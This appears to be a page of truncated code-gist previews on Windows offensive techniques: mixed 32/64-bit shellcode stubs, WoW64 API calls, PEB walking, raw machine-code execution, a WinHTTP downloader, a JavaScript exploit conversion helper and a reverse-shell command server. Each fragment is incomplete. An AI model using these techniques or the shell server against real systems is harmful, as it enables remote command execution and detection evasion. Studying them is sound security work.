# x96_shellcode.py | |
# ref: gist.github.com/aaaddress1/3c0ae754f8a40024881343a085954049 | |
# by aaaddress1@chroot.org | |
''' | |
entry: | |
call $+5 | |
mov ax, cs | |
sub ax, 23h | |
je retTo32b | |
nop |
; x96 shellcode (x32+x64) by aaaddress1@chroot.org | |
; yasm -f bin -o x96shell_msgbox x96shell_msgbox.asm | |
section .text | |
bits 32 | |
_main: | |
call entry | |
entry: | |
mov ax, cs | |
sub ax, 0x23 | |
jz retTo32b |
// get 64 bit Windows API in pure 32 bit mode! | |
// it's necessary to disable all compiler optimizations if you're using MSVC. | |
// more detail check out ReWolf's amazing trick: blog.rewolf.pl/blog/?p=102 | |
// by aaaddress1@chroot.org | |
#include <iostream> | |
#include <stdio.h> | |
#include <windows.h> | |
// ref: raw.githubusercontent.com/rwfpl/rewolf-wow64ext/master/src/wow64ext.h | |
#include "wow64ext.h" |
// fetch current EXE path from 64 bit PEB->Ldr (In 32 bit mode) | |
// by aaaddress1@chroot.org | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <windows.h> | |
typedef struct _PEB_LDR_DATA64 | |
{ | |
ULONG Length; | |
BOOLEAN Initialized; | |
ULONG64 SsHandle; |
// memcpy 32bit by aaaddress1@chroot.org | |
#include <stdint.h> | |
#include <stdio.h> | |
#include <windows.h> | |
int main(void) { | |
int dummy(0x41414242); | |
char buf[8] = {0}; | |
((void(cdecl *)(DWORD, DWORD, DWORD))"\x8B\x7C\x24\x04\x8B\x74\x24\x08\x8B\x4C\x24\x0C\xF3\xA4\xC3")((size_t)buf, (size_t)&dummy, sizeof(dummy)); | |
puts(buf); |
// using WinHTTP to obtain binary data (MSVC) | |
// by aaaddress1@chroot.org | |
#include <vector> | |
#include <stdio.h> | |
#include <windows.h> | |
#include <Winhttp.h> | |
#pragma comment(lib, "winhttp") | |
using namespace std; | |
vector<char>* httpRecv(const wchar_t url[]) { |
class Helpers { | |
constructor() { | |
this.cvt_buf = new ArrayBuffer(8); | |
this.cvt_f64a = new Float64Array(this.cvt_buf); | |
this.cvt_u64a = new BigUint64Array(this.cvt_buf); | |
this.cvt_u32a = new Uint32Array(this.cvt_buf); | |
} | |
ftoi(f) { |
''' | |
Cmd Multiple RevShell Server by aaaddress1@chroot.org | |
[test] $ ncat localhost 54321 | cmd | |
''' | |
import time, socket | |
def handleClient(connection): | |
try: | |
time.sleep(1) | |
connection.send(b'whoami && echo 123 > ggdada.txt && exit\n') | |
except Exception as e: |
// dynamic patch self function by aaaddress1@chroot.org | |
#include <windows.h> | |
#include <algorithm> | |
#include <iterator> | |
using namespace std; | |
// Callee that main() appears to rewrite in place at runtime (per the file
// header; the patching code itself is outside this excerpt). Keep the body
// minimal: its machine-code bytes are presumably what get modified, so any
// change to this function can silently change what main() patches -- TODO
// confirm against main().
void hello()
{
puts("Are You Helloing?");
}
int main(void) |
// VEH Monitor by aaaddress1@chroot.org | |
#include <stdio.h> | |
#include <windows.h> | |
#pragma warning( disable : 4996 ) | |
LONG __stdcall TrapFilter(PEXCEPTION_POINTERS pexinf) { | |
if (pexinf->ExceptionRecord->ExceptionCode == EXCEPTION_ACCESS_VIOLATION && ((DWORD)pexinf->ExceptionRecord->ExceptionAddress & 0x80000000)) | |
pexinf->ContextRecord->Eip = pexinf->ContextRecord->Eip ^ 0x80000000; | |
else if (pexinf->ExceptionRecord->ExceptionCode != EXCEPTION_SINGLE_STEP) | |
return EXCEPTION_CONTINUE_SEARCH; |